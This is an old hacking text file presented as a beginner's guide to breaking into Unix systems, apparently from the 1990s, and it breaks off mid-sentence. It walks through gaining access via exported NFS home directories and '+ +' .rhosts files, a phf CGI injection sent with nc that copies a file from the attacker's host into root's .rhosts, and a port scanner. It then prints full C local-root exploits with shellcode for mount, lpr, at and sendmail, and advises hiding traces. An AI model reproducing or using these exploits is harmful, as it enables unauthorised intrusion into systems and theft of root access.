the newbies-user's guide to hacking.txt

黑客培训教程

			       User's guide
			__________________________

Well, howdi folks... I guess you are all wondering who's this guy (me)
that's trying to show you a bit of everything... ?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).

Copyright and stuff...
______________________

If you feel offended by this subject (hacking) or you think that you could
do better, don't read the below information...
This file is for educational purposes ONLY...;)
I ain't responsible for any damages you made after reading this...(I'm very 
serious...)
So this can be copied, but not modified (send me the changes, and if they
are good, I'll include them ).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press <PgDown>.

















			Intro: Hacking step by step.
_________________________________________________________________________________

Well, this ain't exactely for begginers, but it'll have to do.
What all hackers has to know is that there are 4 steps in hacking...

Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

Ok. In the next pages we'll see exactely what I ment.

Step 1: Getting access.
_______

Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one, then it's time to search another way
in.
What I was trying to do was to exploit an old security problem by most
SUN OS's that could allow an remote attacker to add a .rhosts to a users
home directory... (That was possible if the site had mounted their home
directory.
Let's see what happens...


mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr  victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount
   total 9
   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/
   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/
   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/
   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers
   1 drwx------   3 test     100          1024 Oct  8 21:05 test/
   1 drwx------  15 102      100          1024 Oct 20 18:57 rapper/
  
Well, we wanna hack into rapper's home.
mysite:~>id
uid=0 euid=0
mysite:~>whoami
root
mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history  and you might
forget it on the remote server...

mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
   total 9
   1 drwxrwxr-x   8 root     root         1024 Jul  4 20:34 ./
   1 drwxr-xr-x  19 root     root         1024 Oct  8 13:42 ../
   1 drwxr-xr-x   3 at1      users        1024 Jun 22 19:18 at1/
   1 dr-xr-xr-x   8 ftp      wheel        1024 Jul 12 14:20 ftp/
   1 drwxrx-r-x   3 john     100          1024 Jul  6 13:42 john/
   1 drwxrx-r-x   3 139      100          1024 Sep 15 12:24 paul/
   1 -rw-------   1 root     root          242 Mar  9  1997 sudoers
   1 drwx------   3 test     100          1024 Oct  8 21:05 test/
   1 drwx------  15 rapper   daemon       1024 Oct 20 18:57 rapper/

So we own this guy's home directory...

mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOs ver....(crap).
victim1:~$

This is the first method...
Another method could be to see if the site has an open 80 port. That would
mean that the site has a web page.
(And that's very bad, 'cuz it usually it's vulnerable).
Below I include the source of a scanner that helped me when NMAP wasn't written.
(Go get it at http://www.dhp.com/~fyodor. Good job, Fyodor).
NMAP is a scanner that does even stealth scanning, so lots of systems won't
record it.

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <netdb.h>
#include <signal.h>

int main(int argc, char **argv)
{
  int probeport = 0;
  struct hostent *host;
  int err, i, net;
  struct sockaddr_in sa;

  if (argc != 2) {
    printf("Usage: %s hostname\n", argv[0]);
    exit(1);
  }

  for (i = 1; i < 1024; i++) {
    strncpy((char *)&sa, "", sizeof sa);
    sa.sin_family = AF_INET;
    if (isdigit(*argv[1]))
      sa.sin_addr.s_addr = inet_addr(argv[1]);
    else if ((host = gethostbyname(argv[1])) != 0)
      strncpy((char *)&sa.sin_addr, (char *)host->h_addr, sizeof sa.sin_addr);
    else {
      herror(argv[1]);
      exit(2);
    }
    sa.sin_port = htons(i);
    net = socket(AF_INET, SOCK_STREAM, 0);
    if (net < 0) {
      perror("\nsocket");
      exit(2);
    }
    err = connect(net, (struct sockaddr *) &sa, sizeof sa);
    if (err < 0) {
      printf("%s %-5d %s\r", argv[1], i, strerror(errno));
      fflush(stdout);
    } else {
      printf("%s %-5d accepted.                               \n", argv[1], i);
      if (shutdown(net, 2) < 0) {
	perror("\nshutdown");
	exit(2);
      }
    }
    close(net);
  }
  printf("                                                                \r");
  fflush(stdout);
  return (0);
}

Well, now be very carefull with the below exploits, because they usually get
logged.
Besides, if you really wanna get a source file from /cgi-bin/ use this
sintax : lynx http://www.victim1.com//cgi-bin/finger
If you don't wanna do that, then do a :

mysite:~>echo "+ +" > /tmp/rhosts

mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+
/root/.rhosts" | nc -v - 20 victim1.site.com 80

then 
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#

Or, maybe, just try to find out usernames and passwords...
The usual users are "test", "guest", and maybe the owner of the site...
I usually don't do such things, but you can...

Or if the site is really old, use that (quote site exec) old bug for
wu.ftpd.
There are  a lot of other exploits, like the remote exploits (innd, imap2,
pop3, etc...) that you can find at rootshell.connectnet.com or at
dhp.com/~fyodor. 

Enough about this topic. (besides, if you can finger the site, you can
figgure out usernames and maybe by guessing passwords (sigh!) you could get
access to the site).


Step 2: Hacking r00t.
______

First you have to find the system it's running...
a). LINUX
ALL versions:
A big bug for all linux versions is mount/umount and (maybe) lpr.

/* Mount Exploit for Linux, Jul 30 1996

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_MOUNT "/bin/mount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
   execl(PATH_MOUNT, "mount", buff, NULL);
}

/*LPR exploit:I don't know the author...*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
                        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
                        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
                        "\xd7\xff\xff\xff/bin/sh";
   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}


b.) Version's 1.2.* to 1.3.2
NLSPATH env. variable exploit:

/* It's really annoying for users and good for me... 
AT exploit gives only uid=0 and euid=your_usual_euid.
*/
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define path "/usr/bin/at"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;


   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);


   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   printf("AT exploit discovered by me, _PHANTOM_ in 1997.\n");
   setenv("NLSPATH",buff,1);
   execl(path, "at",NULL);
}

SENDMAIL exploit: (don't try to chmod a-s this one... :) )

/* SENDMAIL Exploit for Linux
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define path "/usr/bin/sendmail"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff./sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;


   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);


   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   printf("SENDMAIL exploit discovered by me, _PHANTOM_ in  1997\n");
   setenv("NLSPATH",buff,1);
   execl(path, "sendmail",NULL);
}

MOD_LDT exploit (GOD, this one gave such a headache to my Sysadmin (ROOT)